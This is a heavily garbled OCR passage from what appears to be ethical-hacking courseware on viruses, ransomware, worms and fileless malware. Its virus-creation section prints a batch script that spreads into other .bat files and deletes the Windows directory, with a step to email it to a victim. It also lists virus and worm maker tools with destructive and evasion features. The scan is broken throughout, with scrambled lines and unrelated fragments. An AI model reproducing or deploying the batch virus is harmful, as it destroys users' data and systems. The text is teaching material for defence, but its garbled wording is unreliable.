741: of sparseinfctor virus
Working
ical andCountermensores
Mackin ©by E-Comel
Copyright
Polymorphic
Viruses
Suchviruses infecta file with an encrypted copyof a polymorphiccodealready decodedbya
decryptionmodule, Polymorphic viruses modifytheir codefor each replication to avoid
detection,They accomplish this bychanging the encryption moduleand the instruction
sequence.Polymorphic mechanisms use randomnumbergenerators i n their implementation.
e
i.
_=
> mantener)
newt
ical andCountermensores
Mackin ©by E-Comel
Copyright
Metamorphic Viruses
Metamorphic viruses are programmed suchthat theyrewrite themselves completelyeachtime
theyinfecta new executablefile. Suchviruses are sophisticated and use metamorphic engines
for
their
execution.
code
of but
with
Metamorphic reprogramsitself.Itstranslated into
new variant the same virus
code,Thistechnique,
different code)
in whichthe originalalgorithm
temporary code(a
andthenconvertedbackinto the original
r emains intact,is usedto avoid pattern
recognitionbyantivirus software.Metamorphic viruses are more effectivethan polymorphic
viruses.
of virus bodiesrangesfromsimple
Thetransformation to complex, depending
on the technique
used.Sometechniques usedfor metamorphosing viruses are as follows:
=
Disassembler
=
Expander
=
Permutator
=
Assembler
Virus
bodies
are
transformed
following
steps:
1, Insertsdeadcode
in the
Reshapes
2.
expressions
Reorders
3,
instructions
Modifiesvariablenames
programcode
Encrypts
Modifiesprogramcontrolstructure
=
Win32/simile
Theintruder programsthis virus i n assembly
language to targetMicrosoftWindows.
i s complicated
Thisprocess andgenerates almost90%of the virus code.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
zmist
ZmistIs alsoknownas Zombie.Mistfall was the first virus to use the technique
called
integration.―
“code Thiscode inserts itself into other code,regenerates the code,
and
rebuildstheexecutable,
Overwriting
Fileor Cavity
Viruses
Some programshave emptyspaces i n them. Cavity
viruses, also known as space fillers,
overwrite a partof the hostfilewitha constant (usuallynulls),
without increasing thelength of
the file while preservingits functionality.
Maintaininga constant file size wheninfecting
allows
the virus to avoiddetection. viruses are rarely
Cavity founddue to the unavailabilityof hosts
andcodecomplexity.
‘A
new designof a Windowsfile,calledthe PortableExecutable(PE), improvesthe loading
speedof programs.However, it leavesa particular gap in the file while itis beingexecuted,
which can be usedbythe cavityvirus to insert itself.The most popular virus family
i n this
is theCIHvirus{known
category as Chernobyl
or Spacefiller).
and
a nd
leading
marketingmanagement
for
authority
marketing
the
enseutives
m anagementindustries
is
inthe sales
Wald peal wall pea) wail we) boll
Thesuspect,
Desmond Tuer, surrendered froth
peal
mult
gall met geal a
ph
Figure
744 Woking
ofoverwrtngfeor
cavityvis
Companion/Camouflage Viruses
‘Thecompanionvirus stores itselfwith the same filenameas the target programfile, Thevirus
infectsthe computer uponexecuting the file,and it modifiesthe harddiskdata.Companion
viruses use DOSto run COMfilesbeforethe execution of EXEfiles.Thevirus installsan identical
COMfileandinfects EXEfiles.
is what happens.
‘This Suppose that a companionvirus is executing on the PCanddecidesthat it
is time to infecta file. It looksaroundand happens to find a file callednotepad.exe. It now
creates a file callednotepad.com, containing the virus. Thevirus usually plantsthisfile in the
same directory as the .exe file;however, it can alsoplace it i n anydirectory
on the DOSpath. If
you typenotepad and pressEnter, DOSexecutes notepad.com insteadof notepad.exe (in
sequence, DOS
willexecuteCOM,
are all in the same directory).
andexecutes notepad.exe.
EXE,
then andthen BATfileswiththe same root
Thevirus executes,possibly
Theuser wouldprobably
infectingmore files,
if they
andthenloads
fail to notice that something is wrong.It is
name,
easyto detecta companion
virus
justbythe presenceoftheextra COMfilein the system,
ical andCountermensores ©
Mackin by E-Comel
Copyright
Viewinfects
thesystem
withafle
roteped.com
andsaves tin
attacker 745:Working
Figure
Notepad.exe
of companionvis! camoufge
vrs
Notepad.com
ShellViruses
hostprogram’s
Theshellvirus codeformsa shellaroundthe target code,makingitselfthe
original
programwiththe hostcodeas its sub-routine,Nearly
allbootprogramvirusesare shell
Before Infection
. Hat
<— Oiignal
regen —>
|
After Infection
Ca
FileExtensionViruses
Vin Coe
—
> a <— orgieal
Progen—>
ical andCountermensores
Mackin ©by E-Comel
Copyright
testhe
Oasiste Ratin
ten 2 tee
(Fie
coc
doses
7.47:Screenshotdisplaying
Figure Options Window
Folder
FATViruses
A FATvirus is a computer
virus that attackstheFileAllocation Table(FAT),a system usedi n
Microsoftproducts and some other typesof computer systems to access the information
storedon a computer. Byattacking the FAT,a virus can cause severe damage to a computer.
FATviruses can workin a varietyof ways.Someare designed to embedthemselves into filesso
that whenthe FATaccessesthefile,the virus is triggered. Othersmayattackthe FATdirectly.
Manyare designed to overwrite files or directories,and materialon a computer can lost
permanently. If a FAT virus is sufficientlypowerful,it can rendera computer unusablei n
additionto destroyingdata,forcing a user to reformatthe computer.
ical andCountermensores
Mackin ©by E-Comel
Copyright
LogicBombViruses
logicbombis a virus that is triggered
‘A bya responseto an event,suchas the launching of an
application
or when a specific is reached,
date/time where it involveslogicto execute the
trigger.
For example,
cyber-criminals
use spyware to covertly
installa keylogger The
on your computer.
keylogger
can capturekeystrokes,
suchas usernames and passwords.
The logicbombis
designedto wait until you visit a websitethat requires you to logi n with your credentials,such
as a bankingsite or socialnetwork.Consequently, the logicbombwill be triggered to execute
the keylogger,
capture yourcredentials, andsendthemto a remote attacker.
Whena logicbomb is programmed to execute on a specific date,i t is referredto as a time
bomb.Timebombsare usually
programmed
to set offwhenimportant
datesare reached,
such
as
WebScripting
and Day.
ChristmasValentine’s
Viruses
web scripting
‘A virus is a typeof computersecurity vulnerability
that breaches your web
browsersecurity through a website.Thisallowsattackersto injectclient-sidescripting
into the
page.It can bypass
‘web access controlsand stealinformationfrom the webbrowser. Web
scriptingviruses are usuallyusedto attacksiteswith large populations,
suchas sites for social
networking, user reviews, andemail.Webscripting viruses can propagate slightly
fasterthan
other viruses. A typicalversion of web scripting
viruses is DDOS. It hasthe potential to send
spam,damage data, anddefraudusers.
Thereare two typesof webscripting viruses: non-persistentandpersistent. Non-persistent
viruses attackyou without your knowledge.
In the case of a persistent
virus,your cookiesare
directly stolen,andthe attacker can hijack your session, whichallowsthe attackerto
impersonate you andcausesevere damage.
Prevention
Thebestways to preventtheseviruses and exploits are bysafely validatinguntrusted
HTMLinputs,enforcing cookiesecurity, disabling
scripts, and usingscanningservices
suchas an antivirus programwith real-timeprotection for your webbrowser.It is also
beneficial
to avoid unknown websitesand use Worldof Trustto ensure that a site is
safe.You wouldnotice if you are infectedwith a web scriptingvirus if your searchesare
linkedelsewhere
and sluggishly,
andthe background or homepage
and programs maycloserandomly.
suchasAdBlocker
changes.
Modern-day
Plus,whichallowusersto preventscripts
Thecomputer runs slowly
browsershaveadd-ons
frombeing loaded.
E-mailViruses
‘An
e-mailvirus refersto computercodesent to you as a n e-mailattachment,whichif activated,
will resulti n some unexpectedand usually harmfuleffects, suchas destroying
specific fileson
your harddiskand causingthe attachmentto be emailedto everyonein your addressbook.
Emailviruses perform a widevariety pop-upsto crashing
of activities,from creating systems or
stealing personal data.Suchviruses alsovaryin terms of how theyare presented.Forexample,
a senderof an emailvirus may be unknownto a user, or a subject line maybe filled with
ical andCountermensores
Mackin ©by E-Comel
Copyright
nonsense. In othercases,a maycleverly
hacker an emailto appearas if it is froma
disguise
trustedor knownsender,
To avoid emailvirus attacks,you shouldnever open(ordouble-click on)a n e-mailattachment
unlessyou knowwho sent it andwhatthe attachmentcontains;i n addition, you must install
anduse antivirus softwareto scan anyattachmentbeforeyou openit.
Armored
Viruses
viruses are viruses that are designed
Armored to confuse
or trick deployed
antivirus systems
to
prevent
showing
detecting
themfrom the actualsource of the infection.Theseviruses makeit difficult
forantivirus programsto trace the actualsource oftheattack.They
some otherlocationeven though theyare actually
trickantivirus programsby
on the system itself.
‘The
basic
following techniques
Anti-disassembly
=
adoptedare byarmoredviruses
Anti-disassembly
produce
is a technique
that usesspecially
an incorrect programlistingbydisassembly
analysis
tools. or
craftedcode data in a programto
Anti-debugging
Anti-debugging
techniques
the debugger.
prevented
are usedto ensure that the programis not runningunder
Thiscan slowdownthe process of reverse engineering, but it cannot be
Anti-heuristics
‘Anti-heuristics codeto preventheuristicanalysis,
are usedi n machine andtheyrelyon
theprogram's ability
Anti-emulation
itself
to protect fromprogrammer anddebugger intervention.
Anti-goat
Anti-goat techniquesuse heuristicrulesto detectpossible goatfilessuchas a virus that
cannot infecta file if it is too smallor if it contains a large amount of do-nothing
instructions.Anti-goatviruses require more time for analysis.
‘Add-on
Viruses
viruses append
‘Add-on theircodeto the hostcodewithout making
anychanges
to the latter or
relocatethehostcodeto insert theircodeat the beginning,
ical andCountermensores
Mackin ©by E-Comel
Copyright
748: Working
Figure of add-on
veus
Intrusive Viruses
Intrusiveviruses overwrite the hostcodecompletely
or partly
with theviralcode.
I Original
Program]
a
DirectActionor TransientViruses
749:Working
Figure eo |
af intrusivevis
Direct
actionviruses
Virus is directly
all of
or transient
the
proportional
transfer controls hostcodeto whereit residesin the
memory.It selectsthe targetprogramto be modifiedand corrupts
to thelife of its host.Therefore,
it. Thelife of a transient
transient virus executesonlyupon
the execution of its attachedprogramand terminates upon the termination of its attached
program.At the time of execution,the virus may spread to otherprograms.Thisvirus is
transient or direct,
as it operates onlyfor a shortperiodand goesdirectly to the diskto search
forprograms
to
infect.
Resident(TSR)
TerminateandStay Viruses
A terminate andstayresident(TSR) virus remains permanently in the targetmachine’s
memory
duringa n entire work session,even afterthe target host’s
programis executedandterminated.
The TSRvirus remains in memoryand thereforehas some control over the processes. In
general, the TSRvirus incorporatesinterruptvectors into its codeso that when an interrupt
occurs,the vector directsexecution to the TSRcode.If the TSRvirus infectsthe system, the
User needsto rebootthe system to remove the virus without a trace.
following
‘The steps
are employed
byTSRviruses to infectfiles:
Gets
‘=
control
of the system
a portionofmemory
Assigns for its code
‘=
Transfers
andactivates itselfi n theallocated
portionofmemory
Hooksthe execution ofcodeflowto itself
to infectfiles
Startsreplicating
ical andCountermensores
Mackin ©by E-Comel
Copyright
;
Ransomware CEH
is malware
\@Ransomware
sytem’
ceator(s)
typeof malware that restricts access to thecompute
onlineransom payment
‘an tothe
filesandfoldersa nddemands
to remove the restrictions
Dharma
‘Dharma
a eal Families .
Ransomware
© crter
though
tims ema
forthedecryption
service eterna
5) —— ————
Ransomware (Cont'd)
‘oa aretha
pceaty ‘i
cnoraix |
Somes ||qusiorennioinetienssencypeon――
Samfam | crsSegesn anes
Ransomware
Ransomware is a typeof malwarethat restricts accessto the infected
computer systemor
criticalfilesanddocumentsstoredon it, andthen demandsa n onlineransom paymentto the
malware creator(s) might
to remove user restrictions. Ransomware encrypt filesstoredon the
disk
systern’s
paying
hard
the ransom.
or merelylockthe system anddisplay
messagesmeant to
trick
the user into
ical andCountermensores
Mackin ©by E-Comel
Copyright
Usually,
ransomware spreads as a Trojan,
entering
a systemthrough emailattachments, hacked
websites,
infectedprograms, app downloadsfrom untrustedsites,vulnerabilitiesi n network
services, andso on. Afterexecution, the payload
in the ransomware runs andencrypts
the
victim'sdata (filesand documents), whichcan be decrypted onlybythe malwareauthor.In
some cases,u ser interaction is restrictedusinga simplepayload.
In a web browser, a text file or webpagedisplays the ransomware demands.The displayed
messages appearto befromcompaniesor lawenforcementpersonnel claiming
falsely that the
victim'ssystem is being usedforillegalpurposesor contains illegal content (e.g.,
pornvideos,
pirated software), or it couldbe a Microsoftproduct activation notice falselyclaiming
that
installedOfficesoftwareis fakeandrequiresproduct re-activation. Thesemessages entice
victims into paying money to undothe restrictions imposed on them.Ransomware leverages
Victims’
fear,trust,surprise,andembarrassment to getthemto paytheransom demanded,
Ransomware Families
Someadditionalransomware familiesare as follows:
=
Cerber
=
CTB-Locker
=
Sodinokibi
=
BitPaymer
CryptXXX
CryptorBit
CryptoLocker
CryptoDefense
=
CryptoWall
*
Police-themed
Ransomware
Examples
of Ransomware
©
Dharma
Dharmais a dreadful ransomware that was first identified in 2016;s ince then,it has
beenaffecting
various targets across the globewith new versions. It hasbeenregularly
updatedwith sophisticated mechanisms in recent years.At the end of March 2019,
Dharmastrucka parking lot systemi n Canada.Previously, it also infected a Texas
hospital
andsome otherorganizations.
Thevariants of this ransomware havethe
following
extension: .adobe,.bip,.combo,.cezar, .ETH,
.java. Its encrypted
fileshave
suchas .xxxxx and.like,Thisransomware employs
new extensions, an AESencryption
algorithm
to encrypt data and then displaysransom notes. Theseransom notes are
namedas eitherInfo.htaor FILESENCRYPTED.txt. Thisransomware carries out through
email campaigns.
The ransom notes ask victims to contact the threat actors via the
provided andpayi n bitcoinsfor the decryption
emailaddress service.
ical andCountermensores
Mackin ©by E-Comel
Copyright
All your fileshavebeenencrypted!
=
Figure
eChoraix
displaying
7.50:Screenshot ransom demand ofDharma
message ransamware
ical andCountermensores
Mackin ©by E-Comel
Copyright
Status:Waiting
Payment.
your
If youwant decrypting filessend 0.055 @ _BTC(bitcoin)
totthis
address: Ea
1LWaqmP4oT]WS3ShtHWm1UjnvaLxtMrakim
Or use QRcode
751:Screenshotdisplaying
Figure d emand
ransom ofechorairansomware
message
SamSam
‘SamSam
a
is notorious ransomware thatinfected
It was firstdiscoveredi n 2016; however,
millionsof unpatched
it was considered
servers i n 2018
as a grave ransomware after
theWannaCry
asymmetric
systems.
due
tovast
attack
encryption
its
technique
victim basei n 2018,SamSam
to encrypt the acquired the
employsRSA-2048
localfiles i n the infected
Unlikeotherransomware, thisransomware doesnot attackvictims randomly.
Thisis a targetedransomware,whichspecifically
targetscertain reputed In
companies.
spiteof
knowing
this, Nearly
largemulti-nationalcompanies
fromsuchattacks.Theattacktechnique
fromthat employed byother ransomware.
employed to
were unable defendthemselves
bythisransomware is alsodifferent
all ransomware uses spam emailsto
propagateand perform attacks;however, SamSam employs brute-forcetacticsagainst
weak passwordsof the Remote Desktop Protocol(RDP).
07
Module 935
Page tical andCountermensores
Making by Comet
Copyright©
Screenshot
Figure752:
displaying
ransom
Someadditionalr ansomware are as
message
SamSam
ransomeare
follows:
demand of
+
WannaCry
+
Petya-NotPetya
+
Gandcrab
MegaCortex
LockerGoga
NamPoHyu
Ryuk
Cryptghost
Module0 7Page
936 ti l andCountermeasures
Macking
©
Copyightby E-Comell
Howto InfectSystems a Virus:Creating
Using a Virus
‘virus
in
can becreated two differentway
ae
EXER
(¢-Weting
avis|| Program OQ
|
a Virus (Cont'd)€
Howto InfectSystems a Virus: Creating
Using \EH
@Using
Virus
Maker
Tools Baker
JPsVirws
Tools
‘Virus
Maker
Module
7 927
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Creating
a Virus
a
WritingSimpleVirus
Thefollowing
Program
stepsare involvedi n writinga simple
virus program:
1.
Create Game.bat
with
following
text:
a batchfile the
echo
@
off
delin +
%9%f
for (*.bat)
docopy%%f Game.
bat
c:\Windows\*.*
ConverttheGame.batbatchfile into Game.com
usingthe bat2com
utility,
SendtheGame.com
file as an emailattachmentto the victim
‘When
Game.com is executedbythe victim,it copies itselfto all the .batfilesi n the
on the targetmachine
current directory and deletesall the filesi n the Windows
directory
Virus MakerTools
Using
Virusmakertoolsallowyou to customize andcraftyour virus into a single
executable
file. The
‘Once
nature
depends
onoptions
of thevirus
available
the
following
maker
tool,
the virus file is built andexecuted,
it can
i n the virus
perform
the tasks:
Disable
Windows command
promptand Windows
TaskManager
©. Shutdownthe system
©
executable
Infectaall
files
©
InjectitselfWindows
into the
Performnon-malicious
start keyboard
registryand up with Windows
activitysuchas unusualmouse and actions
The following
toolsare usefulfortestingthesecurityofyour own antivirus software.
© DELmE’s
DELmE’s
Batch
VirusMaker
BatchVirusGeneratoris a virus creation programwith manyoptionsto
infectthevictim'sPC,
diskdrive,disabling
killing
suchas
the
formatting
adminprivileges,
disabling/removing
tasks,
and
deleting
C: drive,
cleaning
allthe filesi n the hard
changing
the registry,
the antivirus andfirewall
the homepage,
ical andCountermensores
Mackin ©by E-Comel
Copyright
© IPS
Virus Maker
JPSVirus Maker tool used to create customizedviruses. It has many in-built
is
to
‘options Some of the features
create a virus,
task manager,disablecontrol panel,
Defender,
etc
of
this
tool are auto-startup,
enable remote desktop,
disable
turn off Windows
ical andCountermensores
Mackin ©by E-Comel
Copyright
PS
(Virus
Maker
4.0) Tx]
Seale
Internet
EckerMouze
—
Button Sap
ast
Gus Felder
Options
Paley
and
Remove
Leck
Mouse eybord
‘Aways
pen CDROM
Of Tun Mentor
TeraBIT
VirusMaker
Andreinick0S's
BatchVirusMaker
ical
Mackin
and Copyright
©
by
E-Come
Countermensores
How to Infect Systems a Virus:Propagating
Using and
Deploying a Virus
‘Virus
Hoaxes ‘Google
Critical Security
Alert Scam
(©
Hoavesreports
are fle alarms
claiming
emaim essage
should
not be
and
so
wll
certain
viewed doing damageone's
|G Aweltcesigned,
‘heir
fae antivirus loks
andoftenencourages
users to instal
perform
systems, updates,
authentic
eon
or remove
FakeAntivirus Programs
Propagating
and Deploying
a Virus
»yeo-Goune
VirusHoaxes
Techniques
suchas virus hoaxesandfake antivirus softwareare widely
usedbyattackersto
introduceviruses into victims’
systems.
Virus hoaxesc an be nearly as harmfula s realviruses in terms of lossof productivityand
bandwidthwhile naive users react to themandforwardthemto other users. Because viruses
fear,theyhavebecomea common subject
tend to create considerable ofhoaxes.
Virushoaxes
are falsealarms
Thefollowing
claiming
nonexistent
viruses.
reportsof
are some criticalfeaturesof virus hoaxes:
‘=
warning
These
messagemessages, propagated,
rapidly
shouldnot beopened, that e-mail
whichcan be
andthat doing
state
s o woulddamage
a particular
one’s
system.
+
_Insome
cases,thesewarning messagesthemselves contain virus attachments
to crosscheck
‘Try
It is a
the
good
of
identity posted
the personwhohas the warning,
practice to look for technicaldetailsi n any messageconcerningviruses.
searchfor informationon the Internetto learnmore about hoaxes,
Furthermore, especially
by
scanning bulletin boards on which peopleactively discusscurrent community
happenings/concerns. Internet information,
byreading
Beforejumping to conclusions first,
If
the
check following:
the informationi s posted by newsgroupsthat are suspicious,cross-check
the
informationwith anothersource.
If the personwho hasposted
the news is not an expertor a known personi n the
community, crosscheck
the informationwith another
source.
bodyhasposted
If a government the news,the posting
shouldalsohavea referenceto
federal
the correspondingregulation.
Oneof the most effective checks
i s to look up the suspected
hoax virus byname on
antivirus softwarevendorsites.
Google
CriticalSecurity
Alert Scam:
In 2018,a massivehoaxcampaignw as launched, threat actors spread
i n which Google Critical
Security
Alert messagesto victims. GoogleCriticalSecurityAlert is a service provided
byGoogle
to notifyi ts users regarding relatedto their accounts.The activities can include
any activity
logging
in, changing passwords,
changingpersonal information,etc. Attackerscreate andsend
fake alert emailsto victims,thereby notifyingthem that the aforementionedactivities have
takenplace. Bylooking at the criticalalert email,the user clicksthe link provided
in the email
and subsequently getsinfected.Thefigure belowdescribes a hoaxemailstating “New device
signed in to.―Bylooking at this emailwithout notingthe emailsource, the victim clicksthe
“CHECKACTIVITY―buttonandgets trapped.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Newdevicesigned
in to
CCHECKACTIVITY
itl
Figure7.5:Srenshotof Goole
Someadditionalvirus hoaxesare as follows:
Secu Seam
Alert
+
AppleCare
+
+
Chrome
8.5 Video
BangkokEarthquake
critical
error
+
FakeAntiVirus
video
Compromising
ical andCountermensores
Mackin ©by E-Comel
Copyright
At present,a new fake antivirus trend has emerged. Fake antivirus tools are rapidly
proliferating the mobileapplication
space.According
to AV-Comparatives research,two-thirds
ofall antivirus applications in theAndroidPlay
present Storeare fake.
Free Antivirus2019
FreeAntivirus2019is a fake Androidantivirus application.
It is intendedto eliminate
viruses andothermalwarefrommobile devices. whenit is scanned
However, byitself,it
a
is indicatedas MediumRisk, as showni n thescreenshot
below,
756: ScreenshotofAntivius
Figure Pro2017FakeAnivieus
Someadditional
fakeantivirus programsare asfollows:
=
=
AntiVirus
Pro
2017
PCSecureSystem
Antivirus
Totalav
10
ical andCountermensores
Mackin ©by E-Comel
Copyright
Computer Worms
ae
©computerworms
‘that
mals programs
execute, are
ow is a Worm Diff
network
connections,
independent
replicate,
‘hs
available
computing
resources
spread the
aeross
consuming
‘tacks
payloads
to
install ia
backdoors
use worm
‘Aworm speci
replat elf anduse
cae
typeof malware
that an
memorybut cant tach
Worm
Spreads
tombiesadcreates botnet thesebotnetscan
besedt o perform furthere ye attacks (©
A through
the infected
Network
‘Worm:
‘A worm advantage
takes offileor information
© Bondat
Computer
Worms
Computer
worms are standalone maliciousprograms that replicate, andspread
execute, across
networkconnections independentlywithouthumanintervention.Intruders design most worms
to replicate
andspread acrossa network,thusconsuming resourcesand,i n
availablecomputing
turn, causingnetworkservers, web servers, and individual computersystems to become
overloadedand stopresponding. However, some worms alsocarrya payload to damage the
hostsystem,
ofviruses. A worm doesnot requirea hostto replicate;
are a subtype
‘Worms however, i n some
hostmachineis alsoinfected.Initially,
cases,theworm’s blackhat professionalstreatedworms
as a mainframe problem.
Later,withthe introduction ofthe Internet,theymainly focused on
andtargeted WindowsOSusing the same worms bysharing themi n via e-mail,IRC,andother
networkfunctions.
use worm payloads
Attackers to install backdoors
on infected whichturns them
computers,
into zombiesandcreates a botnet.Attackersuse thesebotnetsto initiate cyber-attacks.
Some
ofthelatestcomputer
worms are asfollows:
=
Monero
=
Bondat
=
Beapy
ical andCountermensores
Mackin ©by E-Comel
Copyright
Howisa WormDifferent
froma Virus?
Virus Worm
‘virusinfectsa system byinsertingitself A worm infectsa systembyexploitinga vulnerability
into a file or executableprogram In an 0S or application
byreplicating
itself
deleteor alterthecontent offilesor
It might a worm doesnot modify
Typically, any stored
changethelocationoffilesi n thesystem programs;it only the CPUandmemory
exploits
a
Italters theway computer system
withoutthe knowledge
‘operates
of auser
It consumes networkbandwidth,
or consent etc,, excessively
systems
overloading
system memory,
servers and computer
spreads
‘Avirus at a uniform rate,as worm spreads more rapidlythana virus
programmed
Virusesare difficult to remove from infected Comparedwith a virus, a worm can beremoved
machines easily
froma system
74: Otlerence
‘Table between
vis
and
worm
ical andCountermensores
Mackin ©by E-Comel
Copyright
WormMakers
ves,
thatcan infectiti’
software
les,
Thistool
withby
batch
anvu
comes
into
a compiler
executable
to evade
WormMakers
WormMakers
Worm makersare toolsthat are usedto create and customize computer worms to perform
malicious spread
tasks.Theseworms, once created, independently over networks
andpoison
entire networks.With the helpof pre-defined
optionsi n the worm makers,a worm can be
designed
according
to thetask it is intendedto execute.
=
InternetWormMakerThing
InternetWormMakerThing tool usedto create worms that can infect
i s an open-source
a victim'sdrivesand files,showmessages, disableantivirus software, etc. Thistool
comes with 2 compiler that can easilyconvert your batchvirus into an executableto
or
evadeantivirus software for any other purpose.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
7.57.
Someworm makersa re as follows:
ofInternet WormMaker
Sereenshot Thing
=
BatchWormGenerator
=
CH WormGenerator
Module
07 948
Page tical andCountermensores
Making by Comet
Copyright©
ModuleFlow
‘Malware
Concepts FilolessMalwareConcepts
MalwareAnalysis
‘Trojan
Concepts Countermeasures
Virus and
Worm
Concepts Anti-MalwareSoftware
Malware Concepts
Nowadays,
filelessmalwareis becoming methodof attackbycyber-criminals
a popular because
of the inconspicuouscharacteristics of suchmalwareas well as its ability to evadecommon
security controls.As filelessmalware evadevarious security
c an easily controls, organizations
need to focuson monitoring, detecting, and preventing
maliciousactivities insteadof using
traditionalapproaches suchas scanningfor malwarethrough file signatures. Thissection
discusses various concepts relatedto filelessmalware,
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is FilelessMalware?
also
pae
existing
to infects
erfor
Fillesmalar,
legtimate
nthester
Ieleverags
software,
other
known
anyexisting
protocols
vais
vulnerabilities
non-malware,
malicious act
to infecthesatem
appiatons,and
‘Reasons
for
in fileless Fileless
using
eybor
attacks: Propagation
byTechniques
malware
‘used
attackers
LUvingotttheland
Uses
Trustworthy
deft
Gots
tools
thatstem
ooltexte
used sppliestons
Mamarycade
Infection
re
eral
frequently trout
——@ ction
@ Sript.bsedinecton
malwareexploits
‘Stealth:Fileless legitimate tools;hence,
system itis extremely
difficult
block,
to detect, filelessattacks.
or prevent
LOL (Living-off-the-land):Systemtools exploitedby filelessmalwareare already
installedi n the systembydefault. An attackerdoes not need to create and install
custom toolson the targetsystem.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘=
Trustworthy: toolsusedbyfilelessmalwareare the most frequently
The system used
andtrustedtools;hence, tools incorrectly
security assume that suchtools are running
fora legitimate
purpose.
FilelessTechniquesusedbyAttackers
=
Phishingemails:Attackersuse phishing emailsembeddedwith maliciouslinks or
downloads,
Legitimate
which,
when
clicked,
applications:
malicious
Attackers
the memory.
injectandrun
exploitlegitimate
codei n victim's
installedin the
systempackages
system,suchas Word,andJavaScript,
to run the malware.
Native applications:
Operatingsystems suchas Windowsinclude pre-installed
tools
suchas PowerShell,WindowsManagement Instrumentation(WM).
Attackersexploit
thesetoolsto
install
Infectionthrough
andrun maliciouscode.
lateralmovement: Oncethe filelessmalwareinfectsthe target
system,attackersuse this systemto move laterally i n the networkand infect other
systems connectedto thenetwork.
Malicious websites: Attackerscreate fraudulent
websites that appearlegitimate.
When
a victim visits such a website, it automatically
scans the victim’ssystemto detect
vulnerabilitiesi n pluginsthat can be exploited
bytheattackersto run malicious codei n
the browser'smemory.
Registry
manipulation:
Attackersuse this technique and run maliciouscode
to inject
fromthe Windowsregistrythrough
directly a legitimate
systemprocess.Thishelps
attackersto bypass UAC,application whitelisting, etc., and alsoinfectother running
processes.
Memorycode injection: Attackersuse this technique to injectmaliciouscodeand
maintain persistence i n the process memory of the runningprocesswith the ai m of
propagating and re-injecting it into other legitimate systemprocesses that are critical
for normalsystemoperation.This helps i n bypassing regular securitycontrols.The
various code injection techniques used byattackersincludelocalshellcodeinjection,
remote threadinjection, process hallowing, etc.
ical andCountermensores
Mackin ©by E-Comel
Copyright
of FilelessMalwareThreats
Taxonomy
Type
Exploit
Type!
of FilelessMalware Threats
‘Taxonomy
Source:https://docs.microsoft.com
shown i n the figure
‘As below,
filelessmalwarethreatsare dividedinto differentcategories:
Type
lt
Exploit
‘ Execution/Injec
Typelt
2 Taxonomy
some
(ek but Mes
\ —
& offileless
sera threats:
Hardware
ofa lelss malware
7.5: Taxonomy
Figure threats
Modul
7 952
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Fileless
malware c an becategorized
based o n their pointofentry,ie., howthe malwarecreates
an entrypointinto the targetsystem.Filelessmalwareenters the targetsystemthrough an
or
exploit compromised
According
hardwareor bythenormal
to the abovecategorization,
or
execution ofapplications scripts.
filelessmalwarethreatsare of three typesbasedon
they
howmuchevidence leaveon the victim'smachine:
1:No
Type FileActivity
Thistypeof malware
Performed
never requireswritinga fileonto the disk.An example of suchan
infectionis receivingmaliciouspackets that exploita vulnerability hostthat
i n a target
automatically installsa backdoorin thekernelmemory.Another example mayinvolve
maliciouscodeembeddedwithin the compromised device'sfirmware,Anti-malware
solutions of checking
a re not capable a device's
firmware, itis extremely
Hence, difficult
to detectandprevent suchthreats.
2:
Type IndirectFileActivity
Thistypeof malwareachieves filelesspresenceon the targetmachine
usingfiles.For
example,an attacker can injecta maliciousPowerShellcommandinto the WMI
to configure
repository a filter that executes periodically.
3:
Type Required
Filesto Operate
Thistypeof malwarerequiresfilesto operate,but it does not execute attacksfrom
thosefiles directly.
For example, an attackerexploitsa documentwith an embedded
macro, Java/Flashfile,or EXEfileto injectmalicious into the targethostand
payloads
then maintains persistencewithout usingany files.
=
of
Classification
filelessmalware
Exploits
threatsbased
o n theirpointofentry:
ical andCountermensores
Mackin ©by E-Comel
Copyright
ExecutionandInjection
Thistypeof malwarecan be file-based, macro-based, script-based, or disk-based,File-
basedmalwareexploits executables, DLLS,LNK,files,etc.,to injecta maliciouspayload
into the processmemoryor other legitimate runningprocesses. Using macro-based
malware, attackerstrick victims into clickingmaliciouslinks that execute macros
automatically to injecta maliciouspayload into the processmemory.Attackers
implement script-basedmalwareif theygain a n initial footprint
on the target system.
Theattackerinjectsmaliciouspayload byrunninga malicious scripto n the command
prompt.Disk-based malwarerewrites the bootrecordwith malicious code, which,when
executed,
access
gains
andthe installs maliciouspayload.
ical andCountermensores
Mackin ©by E-Comel
Copyright
HowdoesFilelessMalwareWork?
Pointo f Eatry
ae
Persistence Achieviog
Objectives
Le
=
Pointof Entry
© MemoryExploits:
fileless malwareuses a varietyof techniques
to injectand
the processmemoryof a legitimate
itself i n
‘execute systemprocess.It exploits
the
memoryand privileges
of whitelistedsystemtoolssuchas WindowsManagement
Instrumentation (WMI),
PowerShell,
Command.exe,
PsExec,
etc.
Modul
7Page 955
tical
Making
and by
CountermensoresCopyright©
Comet
Malicious Website: Filelessthreatsmay alsoarrive fromexploit-hostingwebsites
that appear to be legitimate businesspages.Whenthe user visits the page, the
exploitkit starts scanningfor vulnerabilities,suchas any outdatedFlashor Java
plugins. If successful,it invokesWindowsnative tools such as PowerShellto
download andexecute the payload
to the disk,
i n the memorywithoutwriting
directly
any
files
Filelessmalwarecan alsoexploit
script-basedprogramssuchas PowerShell,Macros,
andVBScript.
JavaScript, Theinitialscriptmightbe usedfor code injectionor to
connect to other malicioussites to downloadmore binaries/scripts
to deliverthe
actualpayload.
Phishing Email/Malicious Documents: Attackerscan alsoembedmaliciousmacros
in the form of VBScript or JavaScript i n a MicrosoftOfficedocument(Word,
PowerPoint, Excel)or PDF, and furtheruse socialengineeringtechniques to get
users to run the macros on their systems.Here,the attackinitiates with a document
or file but transforms
into a filelessthreat whenthe malicious
scripti s executed
from memory usingwhitelistedtoolssuchas PowerShell,
CodeExecution
© CodeInjection:Fileless
threatscan use various code injectiontechniquessuchas
processhollowing
andreflectiveDLLinjection, whichdirectly
loadthe shellcodeinto
the memorywithoutwriting
Script-based
any
file
Fileless
Injection:
todisk,
the
malwareoften comes embeddedin a document as
an emailattachment.Once the documentis opened, the maliciousscriptruns i n the
memory,thusturninginto a filelessoperation. Thescripttheninvokes whitelisted
applications,suchas PowerShell,mshta.exe, JavaScript,
WScript,and VBscript, to
